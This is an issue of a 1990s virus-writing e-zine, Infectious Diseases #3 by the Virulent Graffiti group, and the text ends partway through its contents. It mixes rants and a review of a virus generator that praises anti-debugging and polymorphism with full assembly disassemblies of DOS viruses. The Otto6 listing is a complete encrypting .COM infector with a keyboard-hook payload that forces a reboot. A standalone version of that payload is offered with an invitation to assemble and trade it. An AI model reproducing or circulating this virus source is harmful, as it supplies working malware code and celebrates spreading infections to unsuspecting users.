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                        Infectious Diseases, Issue 3,

         Produced by Virulent Graffiti Virus Production Organization
                       Edited By The Attitude Adjuster
            As one irate father said to his slightly preturbed son...
     "Give me a reason I should let you use my computer, if all you do is
                           write viruses on it!?!"
                          Welcome to my world, dad!
 Contents .....................................................   I-D003.001
 Letter of Ranting from The Attitude Adjuster .................   I-D003.002

 Phalcon/Skism G? Review ......................................   I-D003.003

 What I saw the other day on FidoNet ..........................   I-D003.004

 Disassembly of (HA) YAM's Otto 6 .............................   I-D003.005

 Fred Cohen on Virus Based Products ...........................   I-D003.006 
 Disassembly of 10 Past 3 .....................................   I-D003.007

 Soupy Virus Source ...........................................   I-D003.008

 Rapidly Approaching ..........................................   I-D003.009

 The Confusion Ended? .........................................   I-D003.010 

 'Shit... What's wrong NOW?!?' ................................   I-D003.011

 Disassembly of (we promise this is the last for now) the
 Fellowship Virus .............................................   I-D003.012

 DWI Source ...................................................   I-D003.013

 VGVPO Propaganda .............................................    VGVPO.ANS
                                 The Adventures Guild Ad ......      TAG.ANS
                                 Unphamiliar Territory Ad .....      UPT.TXT
                                 Way Cool Lost Horizons Intro . HORIZONS.EXE

  are those over the counter virus remedies doing nothing for you?

  do you feel as if maybe youre a little bit fucked in the head for buying
  that computer in the first place?

  maybe its the annoying snide comments on the screen,

  or the fact that windows doesnt seem to work anymore,

  the secondhand software kills the drive blues...
  whatever it is,
  you have realized that we are winning,
  and you are loosing...

 Greetings: Invalid   Media,  DecimatoR,  GHeap,  Dark  Angel,  Pyster,
            Unfriendly Giant, HitMan, Mirage, Shades, all virus writers
            everywhere, my Mom (my  modem ate her!), ICTOA, Paul, Josh, 
            and anybody else I forgot... oh, yeah, and you too...
                   Personal Rant from The Attitude Adjuster
                      By... err, The Attitude Adjuster

        Err... yo!

        Welcome  again to  Infectious Diseases,  and we  hope you enjoy this
 as much as you've enjoyed our past productions (right... sure...).

        It has  been a  both discouraging  and illuminating  time since last
 issue's release. I  have raved on FidoNet  more  and more (those of you who
 know me by name can see my great revelations... I have to keep myself under
 control when  I  use my  real name, hopefully  I can  get one  of those Jon
 Johnson type accounts to really allow me to express myself...), and was the
 one who instigated the 'YAM  really did  write it' lie... I guess I've kind
 of  toned down  on my  YAM  bashing,  and even  edited out  most of the bad
 comments about them in my dissassembly of their virus in this issue...

        I was rather  pissed/saddened at the busting of ARCV, which Phalcon/
 SKISM has covered with commendable speed and accuracy, thanks guys!

        Now, I  must say both 'Thank  You,'  and 'Fuck You,' to all Virulent
 Graffiti members, who  have both tried and not tried to get articles in for
 ID.  I,  being the  asshole-take  charge type guy  I am edited and put this
 issue together  in  about 4 days, and  will probably release it without the
 knowledge of  the  group... I  am quite  happy with  it,  mainly because it
 contains my disassemblies, and  little else... If  you don't love yourself,
 who do you love? Also, I  am trying  something new... I know that I love to
 view  the activation routines out of viruses,  but, ripping the code out is
 an undue pain in  the  ass, and,  I'd  rather not  run just any virus on my
 system... I  have ripped the 'bomb' routines from Otto6, Soupy, and Fellow-
 ship, and left them as seperate  code under  the  disassemblies... Go ahead
 and assemble  'em,  show 'em  off...  trade  with friends... ah... I need a

        You'll  note that this has a 40Hexish/Social Delinquency look to it.
 Well,  both of those publications are quite successful, so I figured that I
 should use a  conglomeration to  see what I could come up with... For those
 of you that (in the past) call us a P/S copy  group, we will again tell you
 to go  fuck yourselves... True, we  both are  doing a  YAM disassembly, and
 true, I  am stealing  a little  of  the  format, but,  the  first is a pure
 coincedence, and the seconds is professional opinion over ownership... Also
 note that we are never planning to release an MPC hack, in Pascal or other-
			    Review of the P/S G?       
			  By The Attitude Adjuster                          
      NOTE: The word 'idiot' is used throughout this document to refer to
  people  who would  actually  assemble MPC  or  G? code and use it as an 
  original  virus. Do not confuse this term with the 'idiot' which refers
  to users  of the 'Bad  Influence' BBS (who would probably  fit into the
  other category as well!)
     "G?, Phalcon/Skism's  newest virus  creation tool, is designed to allow
 everyone easy  access to  computer virus  source code.   More than a simple
 Vienna hack  generator, it  creates viruses  "on-the-fly" as  per the  user
 specifications.   G? is  designed to  be easily maintainable and extensible
 through the  use of  special data  files created  especially for use by the
       -=P/S=- G? Documentation

	I  downloaded it  eagerly, with  the same  anticipation I  feel with 
 every P/S  creation... I  exited back  to the  famed 'C Prompt,'  and began
 unzipping the new find...  but wait... I expected a revised PS-MPC... and I
 was (happily) mistaken...

	Dark  Angel has  created another classic (though  sure to get listed
 under  PS-MPC  in VSUM,  'cuz hey,  she doesn't even know her own name, let 
 alone  what to  name anyone's  virus... [she  fucked me  over too, guys!]),
 even  more effective  than the PS-MPC (or prunes...), and even more elegant
 than the most IDE-Filled,  Icon Based  piece of Dynamic Link Library trash.

	'On- the-fly' virus  generation has come a long way from the VCS and
 VCL days.  The code  is excellent, and even  improved over MPC coding. I am
 amazed and thrilled by the size of the code, as it is most compact, a great
 learning tool for code optimization.

	The new 'debug resistance' is  also a feature to be commended. Using
 the Intel's  'one-byte-interrupt,' and the fact that this interrupt is used
 as a  breakpoint in debuggers makes  for havok in  most debuggers. Still, a
 hardened programmer  can slide  by it, but, the 'one-byte-interrupt' factor
 makes that a  bitch, as the interrupt is, as I said, only one byte, instead
 of the average 'CD XX' type configuration...

	As with any virus generator, there are cons to be discussed. 

	DecimatoR  makes this  point quite  clear in 40Hex-9...  allow me to 
 quote him...

 "The  authors of MPC and VCL are very talented programmers.  Unfortunately, 
 the users of their  programs are just the opposite.  REAL virus programmers
 have a desire  to LEARN assembler - it's a test of their skill and ability.
 The users  of MPC  and VCL don't have that desire.  They only have a desire
 for recognition - and seeing  their name  in a virus  is a massive ego trip
 for them.   Why?  They did  nothing that  any Joe  Blow couldn't  have done
 using  a code  generator.  If  they REALLY want to prove how cool they are,
 let THEM  write a damn virus generation program and release it.  THAT ALONE
 will show the world their  skill and  ability.  As  for  USING the program,
 well,  I'm  more  impressed  with  a  nicely  formatted  term  paper  using
 WordPerfect  than I am with  viruses created  using MPC and VCL.  If you're
 one of  the  lame idiots  who uses  MPC or  VCL for "writing" viruses, then
 listen  up - those  programs were  written for  2 reasons -  to  prove  the
 programmer  could write such a thing, and to be used as a LEARNING TOOL for
 future virus writers - NOT to be abused the way they currently are."
	Exactly the  point I want to make, barring that he is not as violent
 as I am... but I will stifle the CAPS LOCK here...

	There  WILL always  be the  idiots out  there that  refuse to learn,
 merely to 'Wr1tE GnU \/1/>uZeZ (0/> \/I/>11)!!!1!11' Alas,  they will NEVER
 learn, and, though we may try, points like ours offer little help.

	That's why my personal opinion of code generators is quite low. Yes,
 it is a VERY impressive  work, and,  I commend  DA for his, as I do Nowhere
 Man for his VCL, but, I am still not a supporter of code generators.

	It's the stigma I have with 'learning,' something that dates back to
 when I was H/P avid (yeah, I' m a hacker  turned programmer... yuk!). There
 was  a hush  about users,  you kept  your mouth shut, learned what you saw,
 read the t-files, and did slave work, like scanning, or simple hacking, and
 you picked it up.

	The  code generator  idea is  fine with me, but, it's release to the
 general public hits the  nerve in me that many H/P people balked about when
 SYS-75 information is released  into the  public... there  seems  to be too
 much power in the hands of blithering idiots.

	A  beautiful virus,  masterfully coded  and programmed,  with actual
 work  by a  good-intentioned  programmer is  fine with  me, but, like being
 harassed by  a company  that has  had it's INWATS fucked over, having my HD
 smashed  by a  virus coded  entirely in  MPC, VLC,  or G? with a stupid FAT
 fucker  added in  will really  ruin my day. (On this note, this would never
 happen... only  the most  heavily armored  stealth will  get  thru my anti-
 virus software, which I wrote myself)

	Idiots will use  the generator, whether you try to stop them or not.
 The 'password'  on VCL (which was  shittily concealed anyway... I mean, the
 average joe could  tell the ZIP password was ARoseIsARose) did nothing, and
 as a result, there are malicious VCL viruses out there.

	This  is why  a listed future improvements bother me... let me quote 
 it directly...

   "o  Supports  multiple,  semi-polymorphic   encryption   routines   (full
      polymorphism coming soon)."

	Yep... that's  what  it says, ' full polymorphism.'  I have no doubt
 that DA can do it. I have dissassembled (partially to source level) the MtE
 and fucked  with the new (and seemingly fucked up first version of) TPE and
 have seen that  it is not as hard as plugged to be, merely a task that must
 be  planned and  charted from the  start, as it is, in itself, a huge task.
 Full polymorphism  is something  we would  all benifit from, but, not to be
 given in source form to idiots. I'd belive that text files on this subject,
 or something of that like would be more appropriate... but, hey...

	On  the note  of DA's  semi-polymorphic  routines, they are, indeed,
 semi-polymorphic.  In the  future, he  might try something like instruction
 flipping or selective BS addition, as an alternative to full polymorphism.
 I also fucked up in my original analysis, and I apologize. Assuming that DA
 uses all 4 indexable registers (SI,DI,BP,BX) for indirect addressing, and
 all other unused registers for counting purposes, coupled with INC/INC,
 ADD, and SUB incrementing, and add and xor encryption (I assembled a total
 of 100 different CFG files, and only found xor and add encryption) I'd have 
 to guess at 144 generic wildcard strings to suffice. This is, of course,
 too many. Now, assuming that we apply code frame tactics, we get the

	BYTE    (EITHER 7 OR 37)



	Alogrythmically, this is a piece of cake, which is great, 'cuz the
 more alogrythmic scans that must be added to a scanner, the greater it's
 size and slowness grow... score one more for the virus writers.

	Indeed, with the addition  of G? into the world,  this is one more
 big score for the virus writers... thaks DA!

                            What I saw on FidoNet
                      Capture By The Attitude Adjuster
        Here's something I pulled offa FidoNet Virus... kinda discourages me
 in some ways I'll explain below.

From    : GREG GREELY                           Number    : 858 of 987
To      : ALL                                   Date      : 12/16/92 12:42pm
Subject : True story                            Reference : NONE
Read    : [N/A] (REPLIES)                       Private   : NO
Conf    : 168 - Virus................(FN)
Hey, I have a true story for you all. 
I  got a  call from  a doctor' s office. Their computers were acting strange
and  locking up  so I went over there and took a look at the system. Nothing
was out  of place  until I scanned it. Turns out, the guy has a Stoned virus
that's gone  critical  and  he  didn't  even know it. He had scan but didn't
know how to run  it. Since the system was already critical, I needed a clean
system disk  to run  CLEAN.  It  turns out the system disk(the original) was
infected  too.   The   other   2  copies  of  the  system  disk,  Dbase 3++,
Wordperfect,  Windows 3.1,  all of  them. Every single application and every
single  disk he  had were infected. I didn't have a system disk with me so I
had  to charge  him double  for going  home and getting one. Some people are
sooooooooo ignorant. What a moron.

--- Renegade v12-04 Beta
 * Origin: DragonsLaire BBS - 718-596-5938 (1:278/613)

        Okay, Mr. Greely... what a moron, eh?

        Is  this  the  message Anti-Virus  wants  to give to the public? Be
 smart or else... I hardly think so...

        Anyway,  as  for  this  message, I feel so stupid now, 'cuz I don't
 have  a  system disk  laying here,  and you' d  probably have to charge me
 double! I  think that  I should  probably be  shot  because  I am so anti-
 virus ignorant.

        Wake  up,  you idiot!  The man didn't know... so, you ridicule him,
 not a  brilliant strategy.  The man  needed to  be informed, not chastized
 behind his back...

        I'm   not   sure, is   this  the   attitude   of   most  "Anti-Virus
 Professionals?"  I'd  like to  know... if  you consider yourself one, write
 us on one of our boards...
                           Disassembly of Otto 6        
                          By The Attitude Adjuster
        Well... I  can't  help it,  I wanted  to brush up on my disassmembly
 skills,  as future  projects may call upon them... so, I find the cheapest,
 easiest looking virus I can find to tear to tiny little pieces.
        YAM's  Evolution magazine  showed  up on  Unphamiliar Territory, and
 after  thoroughly laughing at it, I decided that I'd disassemble one of the
 'virii' in it, just because they looked easy.

        The  code was  cheesecake, but,  some of it was a tad confusing, and
 I have  developed the  following: "Stupid people do stupid things in stupid
 ways!" I  realize that  this  is a slightly old  YAM virus, and does not do
 justice to  the level  of some of  their work,  but, let's face it, some of
 this is damn funny!

        This code is a byte-for-byte matchup with Otto6, and I even followed
 the  alternate encoding used by YAM's assembler... (apparently theirs loves
 to assemble using opcode r/m+mod  reg,  rather than  the more  conventional
 opcode reg r/m+mod!)

        Anyway, here's what Patti has to say about it...
 Virus Name:  Otto6
 V Status:    Rare
 Discovered:  September, 1992
 Symptoms:    .COM file growth; decrease in total system & available free
              memory; host program encrypted
 Origin:      United States
 Eff Length:  640 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  F-Prot, ViruScan, Sweep, AVTK 6.00+, UTScan 25.10+,
                    NShld V99+, Sweep/N
 Removal Instructions:  Delete infected files

 General Comments:
       The Otto6 virus was received in September, 1992.  It is from the
       United States.  Otto6 is a non-resident, direct action infector
       of .COM programs, including COMMAND.COM.  It does install a small
       portion of its code in memory, though it is not a complete copy
       of the virus, and the virus is not infective from memory.

       When the first Otto6 infected program is executed, the Otto6 virus
       will install a small portion of its viral code at the top of system
       memory but below the 640K DOS boundary.  Total system and available
       free memory, as indicated by the DOS CHKDSK program, will have
       decreased by 2,048 bytes.  Interrupt 9 will be hooked by the portion
       of Otto6 resident in memory, providing it was not previously hooked
       by some other program.  Also at this time, the Otto6 virus will
       infect one .COM program located in the current directory.

       Each time a program infected with the Otto6 virus is executed, the
       Otto6 virus will infect one previously uninfected .COM program
       located in the current directory.  Infected programs will have a
       file length increase of 640 bytes with the virus being located at
       the end of the file.  The program's date and time in the DOS disk
       directory listing will not be altered.  The following text strings
       are encrypted within the viral code:

               "OTTO6 VIRUS, <<?S>>, YAM,
               "<<?S>> YAM, MICROSHAFT INDUSTRIES (tm.) 1992!"

       The Otto6 virus is an encrypted virus.  It not only encrypts the
       viral code, but the host program as well.

       It is unknown what Otto6 does besides replicate.

        Oh,  yeah, and  I can  tell you what it does besides replicate... it
 displays it' s second  copyright message when you press Ctrl-Alt-Del... big
 shit,  eh? Shit,  I'm  surprised that  description doesn't read COM and EXE
 growth... you can never be certainly with those wily little viruses!

; Otto #6 Virus, By Youth Against McAfee
; Disassembly By The Attitude Adjuster of Virulent Graffiti for
; Infectious Diseases 3 and some other uses...

; Assemble with: TASM /m2 otto5.asm  for a byte for byte matchup
;                TLINK /t otto5.obj        
; The assembled code will NOT execute... a big thanks to YAM for that one! The
; only workaround I got is to trace thru til the mov [00FFh], al, and just
; move the ip ahead to startencrypt!

.model tiny
        org     100h
        db      0e9h, 02, 00                            ; jmp near virusentry

        nop                                             ; they had to be here
        nop                                             ; in the original

        call    getdelta                                ; get delta ofs
        pop     si
        push    si
        sub     si,offset getdelta                      ; sub original ofs
        pop     ax                                      ; delta in ax
        sub     ax,100h
        mov     ds:[00FFh],al                           ; ds:00FFh == al
        push    si                                      ; save delta
        mov     cx,260h                                 ; ieterations
        add     si,offset startencrypt
        xor     [si],al                                 ; xor
        inc     si
        rol     al,1                                    ; rotate
        loop    cryptloop                               ; loop if cx > 0
        pop     si                                      ; delta in si
        mov     ax,word ptr ds:[first3+si]              ; restore first
        mov     dh,byte ptr ds:[first3+si+2]            ; 3 bytes
        mov     word ptr ds:[100h],ax
        mov     byte ptr ds:[102h],dh

        lea     dx,[si+file]                            ; find *.COM
        xor     cx,cx
        mov     ah,4Eh
        int     21h
        jnc     checkinfected                           ; carry?
        jmp     takeithome                              ; no more files

checkinfected:                                          ; check file
        mov     dx,offset 9Eh                           ; filename in default
        mov     ax,3D02h                                ;   dta
        int     21h                                     ; open file r/w
        mov     bx,ax                                   ; handle in BX
        mov     ax,5700h                                ; get file date
        int     21h
        cmp     cl,3                                    ; cl = 3?
        jne     infectitthen                            ; nope
        mov     ah,3Eh                                  ; infected, close
        int     21h
        mov     ah,4Fh                                  ; find next *.COM
        jmp     short findfirstnext                     ; again

infectitthen:                                           ; infect the file
        push    cx                                      ; push time
        push    dx                                      ; push date
        call    lseekstart                              ; lseek beginning
        lea     dx,[si+first3]                          ; buffer at first3
        mov     cx,3                                    ; read 3 bytes
        mov     ah,3Fh
        int     21h
        xor     cx,cx                                   ; lseek the end
        xor     dx,dx                                   ; fileside DX:AX
        mov     ax,4202h
        int     21h
                                                        ; 4D1h
        mov     word ptr ds:[fsize+si],ax               ; save fsize
        sub     ax,3                                    ; calculate jump
        mov     word ptr ds:[fsize2+si],ax
        call    lseekstart
        add     ax,6                                    ; fsize+3
        mov     byte ptr ds:[lob+si],al                 ; lob of fsize+3
        mov     cx,word ptr ds:[fsize+si]               ; size of file
        lea     dx,[si+heap]                            ; point at buffer
        mov     ah,3Fh
        int     21h                                     ; read

        push    si                                      ; push delta
        mov     al,byte ptr ds:[lob+si]                 ; lod of fsize+3
        add     si,offset ds:[heap+3]                   ; point at code
        call    encrypt                                 ; encrypt original
        pop     si                                      ; pop delta
        call    lseekstart                              ; lseek beginning
        mov     cx,word ptr ds:[fsize+si]               ; fsize
        lea     dx,[si+heap]                            ; buffer at heap
        mov     ah,40h                                  ; write file
        int     21h
        jnc     finishinfect                            ; error (attributes)
        jmp     short takeithome                        ; yes
        lea     dx,[si+virusentry]                      ; write encrypter
        mov     cx,startencrypt-virusentry              ; to file
        mov     ah,40h
        int     21h
        push    si                                      ; push delta
        mov     cx,heap-startencrypt                    ; virus length-crypt
        ; mov     di,si                                 ; delta in di
        db      89h, 0F7h                               ; alternate encoding
        add     di,offset ds:[heap]                     ; point at heap
        add     si,offset ds:[startencrypt]             ; point at virus
        rep     movsb                                   ; copy code to heap
        pop     si                                      ; pop delta
        push    si                                      ; push delta
        mov     al,byte ptr ds:[lob+si]                 ; lob of fsize+3
        mov     cx,heap-startencrypt                    ; virus length
        add     si,offset ds:[heap]                     ; buffer at heap
        call    encrypt                                 ; encrypt heap
        pop     si                                      ; pop delta
        mov     cx,heap-startencrypt                    ; virus length
        lea     dx,[si+heap]                            ; buffer at heap
        mov     ah,40h                                  ; write virus
        int     21h
        jc      takeithome                              ; error?
        call    lseekstart
        lea     dx,[si+jump]                            ; buffer at jump
        mov     ah,40h                                  ; write jump
        mov     cx,3
        int     21h
        jc      takeithome                              ; error?
        pop     dx                                      ; pop date
        pop     cx                                      ; pop time
        mov     cl,3                                    ; set infected flag
        mov     ax,5701h                                ; set time
        int     21h
        mov     ah,3Eh                                  ; close file
        int     21h

        push    si                                      ; push delta
        mov     al, byte ptr ds:[00FFh]                 ; saved xor byte
        xor     cx,cx
        ; add     cx,si                                 ; the pricks use 
        db      01, 0f1h                                ; alternate encoding
        add     cx,3                                    ; ieterations in cx
        mov     bp,103h
        mov     si,bp                                   ; unencrypt old code
        call    encrypt
        pop     si                                      ; pop delta
        mov     bp,100h                                 ; where to RET to
        mov     ax,0B0Bh                                ; RuThereCall
        int     9
        cmp     ax,0BEEFh                               ; if beefy, it's
        je      skipinstall                             ; installed
        xor     ax, ax
        mov     ds, ax                                  ; interrupt table
        lds     bx, dword ptr ds:[9*4]                  ; Int 9 -> DS:BX
        push    bp                                      ; push ret addr
        mov     bp,offset ds:[old9]                     ; JMP FAR PTR
        mov     cs:[bp+si+1],bx                         ; offset
        mov     cs:[bp+si+3],ds                         ; segment
        pop     bp                                      ; pop ret addr
        mov     bx,es
        dec     bx                                      ; our MCB paragraph
        mov     ds,bx
        sub     word ptr ds:[0003],80h                  ; allow for us to get
                                                        ; some memory
        mov     ax, word ptr ds:[0012h]                 ; 1st unused segment
        sub     ax,80h
        mov     word ptr ds:[0012h],ax                  ; replace valu
        mov     es,ax                                   ; es = our new seg
        push    cs                                      ; ds = cs
        pop     ds
        xor     di,di                                   ; es:0000 = dest.
        ; mov     bx,si                                 ; more alternate
        db      89h, 0f3h                               ; encoding!!
        lea     si,[bx+our9]                            ; buffer at our9
        mov     cx,200                                  ; more than enough
        rep     movsb                                   ; copy 200 bytes
        mov     ds,cx                                   ; cx = 0000
        mov     word ptr ds:[9*4],0                     ; offset (int 9)
        mov     word ptr ds:[9*4+2],es                  ; segment (int 9)
        push    cs                                      ; restore segments
        push    cs
        pop     ds
        pop     es
        push    bp                                      ; return to 100h
encrypt:                                                ; encrypt
        xor     [si],al                                 ; xor
        inc     si
        rol     al,1                                    ; rotate left
        loop    encrypt                                 ; Loop if cx > 0
        db      'OTTO6 VIRUS, <<',0E9h,53h,'>>, YAM, '
        db      'COPYRIGHT MICROSHAFT INDUSTRIES 1992 (tm.)'

        push    ax
        push    cx
        push    dx
        mov     ax, 4200h                               ; lseek beginning
        xor     cx,cx
        xor     dx,dx
        int     21h
        pop     dx
        pop     cx
        pop     ax

our9:                                                   ; our int9 handler        
        cmp     ax, 0B0Bh
        jnz     NotRuThere                              ; not an ruthere
        mov     ax, 0BEEFh
        IRet                                            ; int return
        push    ax                                      ; save registers
        push    bx        
        push    ds

        xor     ax,ax                                   ; BIOS segment
        mov     ds,ax
        in      al,60h                                  ; get keyboard input
        mov     bl, byte ptr ds:[0417h]                 ; get shift status
        test    bl,08                                   ; alt pressed?
        jz      removeregistersandleave                 ; no
        test    bl,04                                   ; ctrl pressed?
        jz      whyisthishere                           ; no
        cmp     al, 53h                                 ; delete?
        jnz     removeregistersandleave                 ; nope!
        and     bl,0F3h                                 ; mask off bits
        mov     byte ptr ds:[0417h],bl                  ; place in bios
        jmp     onwardbuttheads                         ; go on

        cmp     al,4Ah                                  ; why is this here?
        jne     removeregistersandleave
        pop     ds                                      ; remove registers
        pop     bx
        pop     ax
        ; jmp     returntoold9                          ; more wierd 
        db      0e9h, 20h, 00                           ; encoding!

        push    cs                                      ; ds = cs
        pop     ds
        mov     ax,3                                    ; 80x25 text mode
        int     10h
        mov     ah,2                                    ; set cpos
        mov     bh,0
        mov     dx,0A14h                                ; 10,20
        int     10h
        mov     si,yamlogo-our9                         ; point to logo
        loop    pointlessloop
        lodsb                                           ; load string byte
        cmp     al,0                                    ; end of string?
        je      coldbootus                              ; yes
        mov     ah,0Eh                                  ; display char in al
        int     10h
        jmp     short pointlessloop

old9    db      0EAh                                    ; JMP FAR PTR
        dd      00000000                                ; Int 9h
yamlogo db      '<<',0E9h,53h,'>>, YAM, MICROSHAFT INDUSTRIES (tm.) 1992!'
        db      '   ',0

        mov     dx,28h
        mov     ds,dx                                   ; DS = 0028h
        mov     word ptr ds:[0072h],0                   ; DS:0072h=0
        ; the above does nothing, as the byte they are looking to modify is
        ; the warm-boot status byte, at 0040:0072h... duh...
        db      0EAh                                    ; JMP FAR PTR
        db      00h, 00h, 0FFh, 0FFh                    ; Cold Boot Vector
file    db      '*.COM',0                               ; search wildcard
first3  db      0CDh, 20h, 00h                          ; buffered 1st 3
jump    db      0E9h                                    ; jmp near
fsize2  db       50h, 01h

lob     db       56h                                    ; lob of fsize+3

fsize   db       53h, 01h                               ; filesize

        end     start
; Hurredly written stand-alone demonstration of Otto6, By The Attitude
; Adjuster.

; Assemble with:
;  tasm obomb /m2
;  tlink obomb /t

.model tiny
        org     100h
        mov     ax, 0B0B0h
        int     9
        cmp     ax, 0BEEFh
        jz      exit

        mov     ax, 3509h
        int     21h
        mov     word ptr [old9+1], bx
        mov     word ptr [old9+3], es

        mov     ax, 2509h
        mov     dx, offset our9
        int     21h

        mov     dx, offset endofit
        int     27h
        int     20h

our9:                                                   ; our int9 handler        
        cmp     ax, 0B0Bh
        jnz     NotRuThere                              ; not an ruthere
        mov     ax, 0BEEFh
        IRet                                            ; int return
        push    ax                                      ; save registers
        push    bx        
        push    ds

        xor     ax,ax                                   ; BIOS segment
        mov     ds,ax
        in      al,60h                                  ; get keyboard input
        mov     bl, byte ptr ds:[0417h]                 ; get shift status
        test    bl,08                                   ; alt pressed?
        jz      removeregistersandleave                 ; no
        test    bl,04                                   ; ctrl pressed?
        jz      whyisthishere                           ; no
        cmp     al, 53h                                 ; delete?
        jnz     removeregistersandleave                 ; nope!
        and     bl,0F3h                                 ; mask off bits
        mov     byte ptr ds:[0417h],bl                  ; place in bios
        jmp     onwardbuttheads                         ; go on

        cmp     al,4Ah                                  ; why is this here?
        jne     removeregistersandleave
        pop     ds                                      ; remove registers
        pop     bx
        pop     ax
        ; jmp     returntoold9                          ; more wierd 
        db      0e9h, 20h, 00                           ; encoding!

        push    cs                                      ; ds = cs
        pop     ds
        mov     ax,3                                    ; 80x25 text mode
        int     10h
        mov     ah,2                                    ; set cpos
        mov     bh,0
        mov     dx,0A14h                                ; 10,20
        int     10h
        mov     si,offset yamlogo                       ; point to logo
        loop    pointlessloop
        lodsb                                           ; load string byte
        cmp     al,0                                    ; end of string?
        je      coldbootus                              ; yes
        mov     ah,0Eh                                  ; display char in al
        int     10h
        jmp     short pointlessloop

old9    db      0EAh                                    ; JMP FAR PTR
        dd      00000000                                ; Int 9h
yamlogo db      '<<',0E9h,53h,'>>, YAM, MICROSHAFT INDUSTRIES (tm.) 1992!'
        db      '   ',0

        mov     dx,28h
        mov     ds,dx                                   ; DS = 0028h
        mov     word ptr ds:[0072h],0                   ; DS:0072h=0
        ; the above does nothing, as the byte they are looking to modify is
        ; the warm-boot status byte, at 0040:0072h... duh...
        db      0EAh                                    ; JMP FAR PTR
        db      00h, 00h, 0FFh, 0FFh                    ; Cold Boot Vector

        end start

                            Virus Based Products       
                                By Fred Cohen
                             Capture by The Fly
       I  am  surprised that  so  many  well  respected  Virus-L readers and
 writers  failed to  understand the implication of creating 1500 viruses per
 day that  are  not  detected by  existing scanners.   The point is that the
 number  or percentqge of viruses detected is not as important as the effect
 of the product.

       Of  the CARO  collection of  over 1500  viruses, only a small portion
 have  ever been  found at  a substantial  number of  sites,  and  many  are 
 collector-only viruses that have never appeared in the wild.

        I am  quite astounded  by the  concept  that creating viruses in the
 privacy of  my home  should offend  anti-virus  types.  In fact, I have had 
 automated virus generation systems running for several years. At one point,
 I was  trying to create ecosystems by randomly generating tens of thousands
 of candidates per  day, many  of  which were  successful viruses.  Why does
 this  offend other  researchers?  And  I  take it from some of the comments
 that these  researchers have  NEVER created a virus of their own to explore
 the concept!   It's  sad that  people who  have never tried it feel free to
 condemn it.   Or have  they done  it and simply don't have the integrity to
 admit it?

         ASP  has already  introduced  one  virus-based  commercial  product 
 (which  has never been detected  as  a virus by any scanner) which operates
 quite well,  and  we  are in  the process  of creating  another virus-based
 product  designed to operate  in LANs.  Our users don't seem to be offended
 by  the  optimization of  resource utilization, automated  distribution and
 installation, high  reliability, and small space used by our products based
 on viruses, but it seems  to  offend the  anti-virus  community that all of
 their overblown  claims about  all viruses being bad are being undercut  by
 benevolent viruses  that are  safe and  reliable.   In  fact, most  of  our
 viruses  work on  far more systems than most virus defenses, and they don't
 spread where they are  not supposed  to  go.   They are easy to control and
 remove,  they are  compatable with  every  DOS based system we have seen to
 date, and  they have  never generated  any unintended  side-effects.  Kinda
 blows the whole "all viruses are bad" thing, huh!


        P.S. considering the people who agree with my recent postings, I may
 have  been  wrong -  nah -  you  know  you're not saying much when everyone
 agrees with you - the lemmings to the sea thing and all.
                          Disassembly of 10 Past 3
                          By The Attitude Adjuster                        
        Well... I was bored, and, I am still relatevly bad at doing
 disassemblies, so, I thought I'd do a seemingly interesting virus, and
 do it well...

        First, what Patti says...
 Virus Name:  10 Past 3
 Aliases:     748
 V Status:    Rare
 Discovery:   1991
 Symptoms:    .COM file growth; keyboard keypresses altered; system reboots;
              hardware devices disabled or interference
 Origin:      Unknown
 Eff Length:  748 Bytes
 Type Code:   PRaCK - Parasitic Resident .COM Infector
 Detection Method:  CPAV 1.4+, AVTK 6.0+, F-Prot, IBMAV, Iris, Panda, VNet,
                    VBuster 3.93+, ViruScan V99+, Sweep 2.43a+, Trend,
                    AllSafe, ViruSafe, NAV 2.1.2+, UTScan 25.10+, Vi-Spy,
                    CPAV/N, LProt, NShld V99+, Sweep/N
 Removal Instructions:  Delete infected files

 General Comments:
       The 10 Past 3, or 748, virus was submitted in November, 1992.  This
       virus was actually isolated much earlier, in early 1991.  10 Past 3
       is a memory resident infector of .COM programs, including

       The first time a program infected with the 10 Past 3 virus is
       executed, this virus will install itself memory resident in low
       available system memory, hooking interrupts 21 and 6B.  Total
       system and available free memory, as measured by the DOS CHKDSK
       program, will not be altered.

       Once the 10 Past 3 virus is memory resident, it will infect .COM
       programs, including COMMAND.COM, when they are executed.  Infected
       programs will have a file length increase of 748 bytes with the
       virus being located at the end of the file.  The program's date and
       time in the DOS disk directory listing will not be altered.  No
       text strings are visible within the viral code.

       The 10 Past 3 virus activates between 15:10 and 15:13 (3:00PM and
       3:15PM) every day, at which time it will cause the "Ctrl" or "Shift"
       keys to be invokes occassionally when the system user enters a
       character on the system keyboard.  As a result, the character input
       may not be the same as what the user intended.  Additionally, it
       either disables or interfers with the functioning of the following
       devices on the days of any month indicated below:

                1st day of any month - keyboard
               10th day of any month - system hard disk
               16th day of any month - system monitor/display
               29th day of any month - disk drives

       On the 22nd day of any month, unexpected system reboots may occur.

       Known variant(s) of 10 Past 3 are:
       10 Past 3-B: A 789 byte variant of the 10 Past 3 virus, this
                    variant adds 789 bytes to the .COM programs it infects,
                    including COMMAND.COM.  It will occassionally display
                    the following text on the system monitor:
                    The text is visible within the viral code in all
                    10 Past 3-B infected programs.
                    Origin:  Republic Of South Africa  January, 1993.
        Now, allow me to quote from the woman who can't write...
      'The 10 Past 3 virus activates between 15:10 and 15:13 (3:00PM and
       3:15PM) every day, at which time it will cause the "Ctrl" or "Shift"'

        Sheesh, Patti, grow a little programming knowledge, and maybe learn
 how to read military time!

        Anyway, here's the code, hope you like it... I found it to be a
 thoroughly boring piece of code, 'cept for a few little things, just angles
 I had yet to look from... As always, this is byte for byte with the sample
 that I worked from... Scans as it, must be it ("Look man, RedX!" Ha!)...
.model tiny  

; 10 Past 3, Disassembly done by The Attitude Adjuster for ID Issue 3.
; All hail the holy XCHG AX,AX!        
        org     100h

        db      0E9h, 1Dh, 00                           ; jmp near intovirus
        db      0B4h, 09h                               ; mov ah, 9
        int     21h
        int     20h
        nop                                             ; F!#K
        nop                                             ; F!#K
        nop                                             ; F!#K
        nop                                             ; F!#K
        nop                                             ; F!#K
        nop                                             ; F!#K
        nop                                             ; F!#K
hello   db      'Hello world !', 0Dh, 0Ah, '

        jmp     short furtherintovirus
        nop                                             ; F!#K
        db       0Ah, 24h
        db      0E9h, 1Dh, 00h
        db       20h, 00h
        db       20h
        db       42h, 8Fh, 51h, 15h
        db       01h, 00h
        db       00h, 00h
        db       56h, 05h,0E1h, 33h
        db      00h
        db       25h, 01h,0C4h, 34h

        mov     word ptr ds:[100h], 10BAh               ; Replace 1st 3
